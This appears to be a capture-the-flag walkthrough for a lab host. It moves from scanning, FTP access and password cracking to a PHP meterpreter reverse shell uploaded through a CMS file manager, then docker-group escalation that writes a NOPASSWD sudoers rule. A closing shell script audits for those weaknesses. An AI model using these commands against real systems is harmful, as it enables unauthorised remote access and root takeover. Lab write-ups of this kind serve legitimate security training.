We start by scanning the host: nmap -A -T4 -p- 192.168.1.3 -vv

Running dirb

There is an FTP service on port 65530 that allows login with the anonymous username.

The file we’ve downloaded is password protected

We need to download a Python script called 7z2john.py to extract the hash from the file, then crack it with John.
python 7z2john.py arjun.7z > hash.txt


The password is family, let’s open the file.

The file contains a string that looks Base64-encoded; we can decode it using base64.

gila:admin@gmail.com:princesa
gila is a directory name: 192.168.1.3/gila

Running dirb gave us http://192.168.1.3/gila/admin/. Now we log in with the email admin@gmail.com and the password princesa.

After we log in, there is a File Manager where we can upload a PHP shell; upload it to the tmp folder.
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -f raw -o shell.php

Now visit the link at http://192.168.1.3/gila/tmp/shell.php. Also make sure to start Metasploit and start a session, or just open a listening port using nc -lvp 4444

Reading the group file, we can see that we are in the docker group; we can escalate from there.

Just write the following commands:
docker run --privileged --interactive --tty --volume /:/host bash
echo "www-data ALL=(ALL) NOPASSWD: ALL" > /host/etc/sudoers.d/foo

Now just read the final.txt
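
The escalation above works because membership in the docker group is root-equivalent. The following audit sketch is an added example, not part of the original walkthrough: it lists docker group members and flags sudoers drop-ins granting NOPASSWD: ALL. The function names, the sample GIDs and the temporary sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added audit example; not part of the original walkthrough.

# Print each supplementary member of the docker group in a group(5) file.
# Any account listed here can start privileged containers, so it is root-equivalent.
docker_group_members() {
    awk -F: '$1 == "docker" && $4 != "" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print m[i]
    }' "$1"
}

# Print "file: rule" for every non-comment line in a sudoers drop-in
# directory that grants NOPASSWD: ALL.
nopasswd_all_rules() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        awk '!/^[ \t]*#/ && /NOPASSWD:[ \t]*ALL/ { print FILENAME ": " $0 }' "$f"
    done
}

# Constructed sample data mirroring the state described above (GIDs are made up).
SAMPLE=$(mktemp -d)
mkdir "$SAMPLE/sudoers.d"
cat > "$SAMPLE/group" <<'EOF'
root:x:0:
www-data:x:33:
docker:x:998:www-data
EOF
cat > "$SAMPLE/sudoers.d/foo" <<'EOF'
www-data ALL=(ALL) NOPASSWD: ALL
EOF
cat > "$SAMPLE/sudoers.d/readme" <<'EOF'
# example only: user ALL=(ALL) NOPASSWD: ALL
EOF

echo "docker group members:"
docker_group_members "$SAMPLE/group"
echo "passwordless sudo rules:"
nopasswd_all_rules "$SAMPLE/sudoers.d"
```

On a real host, point the functions at /etc/group and /etc/sudoers.d; a web service account such as www-data appearing in either output deserves investigation.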
